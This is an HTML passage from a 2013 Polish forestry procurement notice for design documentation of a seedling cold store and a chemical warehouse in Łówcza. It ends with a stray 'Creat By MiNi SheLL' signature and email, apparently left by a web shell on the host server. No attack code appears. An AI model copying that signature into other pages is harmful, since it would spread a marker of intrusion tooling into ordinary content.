<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski kurs średni waluty na dzień: * wystawienia przez instytucję finansową dokumentu o posiadaniu środków finansowych na rachunku bankowym o zdolności kredytowej, * wystawienia polisy odpowiedzialności cywilnej, * zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 4 do SIWZ.
Zamawiający przewiduje możliwość dokonania następujących zmian istotnych postanowień umowy w stosunku do treści oferty, na podstawie której dokonany zostanie wybór wykonawcy:
1.zmiana ceny oferty na skutek zmiany stawki podatku VAT - w przypadku zmiany dokonanej przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustaw o podatku od towarów i usług oraz o podatku akcyzowym; 
2.zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej takimi samymi uprawnieniami, jakie wymagane były w SIWZ 
3.zmiana harmonogramu rzeczowo-finansowego wykonywania przedmiotu umowy bez zmiany ostatecznego terminu wykonania umowy, określonego w Istotnych postanowieniach umowy po uprzedniej akceptacji Zamawiającego, 
4.zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy na innego legitymującego się takimi samymi kwalifikacjami/doświadczeniem zawodowym po uprzedniej akceptacji Zamawiającego.
5. zmniejszenie zakresu zadań do wykonania - zmniejszenie wynagrodzenia będzie obliczone w oparciu o stawki jednostkowe wymienione w ofercie z uwzględnieniem ilości rzeczywiście wykonanych prac.
6. zmiana terminu wykonania prac (termin wykonania prac może ulec zmianie w następujących okolicznościach:
a) przeszkód wynikających z organów administracyjnych w zakresie nadzoru, oraz warunków wykonywania przedmiotu umowy
b) Zamawiający z ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, takich jak warunki atmosferyczne niesprzyjające wykonaniu przedmiotu umowy, lub innych okoliczności technicznych, które mogą uniemożliwiać prowadzenie prac. W takim przypadku termin wykonania przedmiotu zamówienia zostanie przesunięty o ilość dni niezbędną do wykonania prac.

Umowa zostanie zawarta na podstawie złożonej przez wykonawcę oferty.
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści umowy, zmiany umowy będą mogły być wprowadzone w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i wykonawca nie przewidzieli w chwili zawierania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_narol/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Narol, ul. Bohaterów Września 1939 r. Nr 38, 37-610 Narol pokój nr 8 (Sekretariat)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2013 godzina 10:00, miejsce: Nadleśnictwo Narol, ul. Bohaterów Września 1939 r. Nr 38, 37-610 Narol pokój nr 8 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji techniczno - projektowej na Budowę chłodni na sadzonki w szkółce leśnej w Łówczy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje: 
-	weryfikacja koncepcji Nadleśnictwa dotyczącej lokalizacji i parametrów projektowanej do budowy chłodni na sadzonki, 
-	opracowanie dokumentacji techniczno - projektowej chłodni na sadzonki - podstawowe parametry: budynek parterowy, konstrukcja ścian żelbetowa, ściany zewnętrzne do wysokości ok. 2 - 2.5 m obsypane ziemią, izolacje przeciwwilgociowe (poziome i pionowe), izolacje cieplne (poziome i pionowe), dach dwuspadowy o kącie pochylenia ok. 40 - 45 stopni, wymiary: długość ok. 25m, szerokość ok. 12 m, 2 bramy wjazdowe umieszczone na całej długości chłodni (wschód - zachód), wysokość bram wjazdowych umożliwiająca wjazd ciągnikiem rolniczym ze sprzętem rolniczym (przyczepą). W budynku należy zlokalizować: chłodnię kontenerową na nasiona, sadzonki (kubatura ok. 16.5 m2) z agregatem zasilanym prądem elektrycznym oraz pomieszczenie gospodarcze (kubatura ok. 16.5 m2). Przewidywane jest dołowanie sadzonek w gruncie, chłodzenie na całości agregatem zasilanym prądem elektrycznym. Projektowane instalacje: elektryczna 220V i 380V, sanitarna (woda do celów gospodarczych), wentylacyjna (grawitacyjna, wymuszona). Zaprojektowanie utwardzonych dojazdów do, w i wokół chłodni.
Projekt chłodni na sadzonki obejmuje: 
- projekt budowlany, sporządzony zgodnie z art.34, ust.3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010r.. nr 243poz. 1623 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r. nr 120 poz. 1133 z późn. zm.).
-projekt wykonawczy.
- przedmiar robót zawierający szczegółowe zestawienie przewidzianych do wykonania robót w kolejności technologicznej, ich wykonania wraz ze szczegółowym ich opisem, wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót. 
- specyfikacja techniczna wykonania i odbioru robót budowlanych zawierająca zbiory wymagań.
- szczegółowy kosztorys inwestorski opracowany zgodnie z wytycznymi zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowania kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389 z późn. zm.).
- kosztorysy nakładcze (ślepe) opracowane na podstawie kosztorysu inwestorskiego.
- informacja BIOZ.
- usytuowanie obiektu na mapie sytuacyjnej w skali 1:500.
Dodatkowe warunki dotyczące przedmiotu zamówienia w zakresie dokumentacji projektowej:
- dokumentacja nie może wskazywać nazw własnych, konkretnych technologii, patentów, produktów, itp.
- Wykonawca przenosi na Zamawiającego wszelkie prawa autorskie oraz prawa zależne związane z dokumentacją projektową.
- dokumentację należy wykonać w pięciu egzemplarzach w formie papierowej i jednym w formie elektronicznej na płytach CD w formatach - dla plików tekstowych DOC oraz dla plików nieedytowalnych w formacie PDF niezbędnych do zamieszczenia opracowania na stronie internetowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji techniczno - projektowej na Budowę magazynu na środki chemiczne w szkółce leśnej w Łówczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje: 
-	 weryfikacja koncepcji Nadleśnictwa dotyczącej lokalizacji i parametrów projektowanego do budowy magazynu na środki chemiczne, 
-	 opracowanie dokumentacji techniczno - projektowej magazynu na środki chemiczne -                      podstawowe parametry: budynek parterowy, ławy żelbetowe, konstrukcja ścian z bloczków ceramicznych lub betonowych, izolacje przeciwwilgociowe (poziome i pionowe), izolacje cieplne (poziome i pionowe), stolarka okienna i drzwiowa, dach dwuspadowy, wymiary: długość ok. 10 m, szerokość ok. 6 m. W budynku magazynu należy zlokalizować: pomieszczenie gospodarcze (kubatura ok. 30 m2). Projektowane instalacje: elektryczna, sanitarna, wentylacyjna, grzewcza. 
Projekt magazynu na środki chemiczne obejmuje: 
- projekt budowlany, sporządzony zgodnie z art.34, ust.3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010r.. nr 243poz. 1623 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r. nr 120 poz. 1133 z późn. zm.).
-projekt wykonawczy.
- przedmiar robót zawierający szczegółowe zestawienie przewidzianych do wykonania robót w kolejności technologicznej, ich wykonania wraz ze szczegółowym ich opisem, wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót. 
- specyfikacja techniczna wykonania i odbioru robót budowlanych zawierająca zbiory wymagań.
- szczegółowy kosztorys inwestorski opracowany zgodnie z wytycznymi zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowania kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389 z późn. zm.).
- kosztorysy nakładcze (ślepe) opracowane na podstawie kosztorysu inwestorskiego.
- informacja BIOZ.
- usytuowanie obiektu na mapie sytuacyjnej w skali 1:500.

Dodatkowe warunki dotyczące przedmiotu zamówienia w zakresie dokumentacji projektowej:
- dokumentacja projektowa winna spełniać wymagania określone w Rozporządzeniu Ministra Rolnictwa i Rozwoju Wsi z dnia 24 czerwca 2002 r. w sprawie bezpieczeństwa                  i higieny pracy przy stosowaniu i magazynowaniu środków ochrony roślin oraz nawozów mineralnych i mineralno - organicznych (Dz.U. z dnia 4 lipca 2002 r.),
- dokumentacja nie może wskazywać nazw własnych, konkretnych technologii, patentów, produktów, itp.
- Wykonawca przenosi na Zamawiającego wszelkie prawa autorskie oraz prawa zależne związane z dokumentacją projektową.
- dokumentację należy wykonać w pięciu egzemplarzach w formie papierowej i jednym w formie elektronicznej na płytach CD w formatach - dla plików tekstowych DOC oraz dla plików nieedytowalnych w formacie PDF niezbędnych do zamieszczenia opracowania na stronie internetowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com